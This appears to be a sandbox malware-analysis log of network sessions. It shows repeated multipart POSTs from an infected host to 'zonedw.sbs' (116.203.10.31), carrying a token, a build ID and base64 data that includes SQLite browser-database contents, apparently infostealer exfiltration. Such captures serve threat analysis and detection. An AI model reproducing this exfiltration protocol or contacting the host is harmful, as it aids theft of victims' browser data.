                                                                                                                                                                                                                                                2024-12-13 12:55:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:08 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:08 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                                                                                                                                                                                Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                                                                                                                                                                                2024-12-13 12:55:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:09 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                70192.168.2.450465116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:09 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KXL68GLF3EKN7Y58Y5FC
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 66001
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:09 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 58 4c 36 38 47 4c 46 33 45 4b 4e 37 59 35 38 59 35 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 4c 36 38 47 4c 46 33 45 4b 4e 37 59 35 38 59 35 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 4c 36 38 47 4c 46 33 45 4b 4e 37 59 35 38 59 35 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------KXL68GLF3EKN7Y58Y5FCContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------KXL68GLF3EKN7Y58Y5FCContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------KXL68GLF3EKN7Y58Y5FCCont
                                                                                                                                                                                                                                                2024-12-13 12:55:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:09 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:09 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:10 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                71192.168.2.450469116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----PH4EU37QIEUAAASR9H4E
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 153381
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 50 48 34 45 55 33 37 51 49 45 55 41 41 41 53 52 39 48 34 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------PH4EU37QIEUAAASR9H4EContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------PH4EU37QIEUAAASR9H4EContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------PH4EU37QIEUAAASR9H4ECont
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:55:12 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
